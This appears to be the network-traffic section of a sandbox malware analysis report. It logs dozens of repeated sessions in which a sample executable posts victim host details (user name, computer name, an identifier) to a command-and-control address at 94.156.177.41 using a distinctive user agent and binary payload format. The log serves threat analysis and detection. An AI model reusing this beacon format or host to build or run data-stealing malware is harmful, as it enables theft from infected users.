                              Jan 11, 2025 08:38:48.273475885 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:48.971910000 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:48 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              100192.168.2.95008094.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:49.111938000 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:49.116902113 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:49.815977097 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:49 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              101192.168.2.95008194.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:49.955159903 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:49.960016012 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:50.672028065 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:50 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              102192.168.2.95008294.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:50.818588972 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:50.825320959 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:51.546145916 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:51 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              103192.168.2.95008394.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:51.690907001 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:51.695758104 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:52.407480001 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:52 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              104192.168.2.95008494.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:52.550494909 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:52.555444002 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:53.254826069 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:53 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              105192.168.2.95008594.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:53.409419060 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:53.414346933 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:54.121906042 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:54 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              106192.168.2.95008694.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:54.268899918 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:54.273813009 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:54.976531029 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:54 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              107192.168.2.95008794.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:55.129506111 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:55.134434938 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:55.873589039 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:55 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              108192.168.2.95008894.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:56.031610012 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:56.036472082 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:56.739826918 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:56 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              109192.168.2.95008994.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:56.982789993 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:56.987644911 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:57.718441010 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:57 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              110192.168.2.95009094.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:57.865300894 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:57.870196104 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:58.557475090 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:58 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              111192.168.2.95009194.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:58.705477953 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:58.710491896 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:38:59.435040951 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:38:59 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              112192.168.2.95009294.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:38:59.650599957 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:38:59.655514002 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:39:00.362013102 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:39:00 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              113192.168.2.95009394.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:39:00.507380962 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:39:00.512249947 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:39:01.204404116 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:39:01 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              114192.168.2.95009494.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:39:01.360174894 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:39:01.365443945 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:39:02.212785006 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:39:02 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              115192.168.2.95009594.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:39:02.469041109 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:39:02.473916054 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:39:03.191502094 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:39:03 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              116192.168.2.95009694.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:39:03.347358942 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:39:03.353241920 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:39:04.061333895 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:39:03 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              117192.168.2.95009794.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:39:04.205315113 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:39:04.211637974 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:39:04.924549103 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:39:04 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              118192.168.2.95009894.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:39:05.107002020 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:39:05.111898899 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:39:05.834467888 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:39:05 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              119192.168.2.95009994.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:39:05.997314930 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:39:06.002182007 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:39:06.824202061 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:39:06 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              120192.168.2.95010094.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:39:06.974673033 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
